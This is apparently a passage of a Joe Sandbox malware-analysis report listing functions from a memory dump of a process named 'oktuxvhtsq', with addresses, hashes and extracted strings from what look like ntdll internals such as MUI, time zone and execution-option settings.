                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                  • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                  • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FB50 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FBE8 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                  • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                  • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                  • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FC48 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FC30 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                  • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                  • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                  • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FD5C Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00731D80 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FE24 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FF34 Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0072FFFC Relevance: .0, Instructions: 6COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00758788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • Kernel-MUI-Language-SKU, xrefs: 007589FC
                                  • Kernel-MUI-Number-Allowed, xrefs: 007587E6
                                  • WindowsExcludedProcs, xrefs: 007587C1
                                  • Kernel-MUI-Language-Allowed, xrefs: 00758827
                                  • Kernel-MUI-Language-Disallowed, xrefs: 00758914
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: _wcspbrk
                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 402402107-258546922
                                  • Opcode ID: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                  • Instruction ID: 0a2a6bccf57b74669135fc915fec59ba5444a59e5f638f92d9dfc0a2d4a0b0b9
                                  • Opcode Fuzzy Hash: a167312b6b4213007bb782e31a2330bf927fa09dad8f62f4225cc884200cffac
                                  • Instruction Fuzzy Hash: 34F115B2D00209EFDF51DF94C985DEEB7B8FF08301F14446AE905A7211EB78AA45DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007C822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: _wcsnlen
                                  • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                  • API String ID: 3628947076-1387797911
                                  • Opcode ID: 45a8b8d171f889cc70c24fd5bd6995d95b7b6813f3ca3df15b22deb4b2b4fd66
                                  • Instruction ID: 1f8624bbf28ab91affbf77502756dff77c890b3d05ab19b9db422aaed68dd23d
                                  • Opcode Fuzzy Hash: 45a8b8d171f889cc70c24fd5bd6995d95b7b6813f3ca3df15b22deb4b2b4fd66
                                  • Instruction Fuzzy Hash: 2D41D871340249FBEB029A91CC46FDF77ACAF05B44F24412EBA10D6191DBB8DB00C7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007713CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                  • Instruction ID: a592f67da5e6c95447368361a62582baff0230017c4683c62d1ce5317f2ce97e
                                  • Opcode Fuzzy Hash: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
                                  • Instruction Fuzzy Hash: A96137B1900655EADF34CF5DC8808BE7BB5EF94300B94C52DF99A47641D27CAA40CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 007D3B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 630ab70d112e57bdb7f76a482d2b70629c8713a65bf5c2105032cc45ca60427c
                                  • Instruction ID: b02a3f6a37ec503a258dbe205155a7e9da450b2c8fa5387403bddc89279d946c
                                  • Opcode Fuzzy Hash: 630ab70d112e57bdb7f76a482d2b70629c8713a65bf5c2105032cc45ca60427c
                                  • Instruction Fuzzy Hash: FD61A6B2910648ABDB20DF69C84147E7BF5EF54311B14C52AF8ADA7241E278EF409B72
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00767EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                  Download Yara Rule
                                  APIs
                                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00783F12
                                  Strings
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0078E345
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0078E2FB
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00783F75
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00783EC4
                                  • ExecuteOptions, xrefs: 00783F04
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00783F4A
                                  • Execute=1, xrefs: 00783F5E
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: BaseDataModuleQuery
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 3901378454-484625025
                                  • Opcode ID: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                  • Instruction ID: 30286a2fc8b3622a829d088f6c0825a0d86035c3761885e44a4e3d126e91a33d
                                  • Opcode Fuzzy Hash: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
                                  • Instruction Fuzzy Hash: 2641AD7168061CFADB20AE54DCCAFDA73BCAF54714F000595B605E6092EB789B46CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00770B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
                                  • Associated: 00000007.00000002.420725396.0000000000710000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000800000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000810000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000814000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000817000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000007.00000002.420725396.0000000000880000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_710000_oktuxvhtsq.jbxd
                                  Similarity
                                  • API ID: __fassign
                                  • String ID: .$:$:
                                  • API String ID: 3965848254-2308638275
                                  • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction ID: d5d01b3d71e993e05c5a94f67dae0f804c7ecfa9f38d3ef88ee363e3ccdcc407
                                  • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                  • Instruction Fuzzy Hash: 79A19D7190030AEFCF25CF64C8556FEB7B4AF15384F24C56AD84AA7282D6389A41CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00770554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00792206
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: true
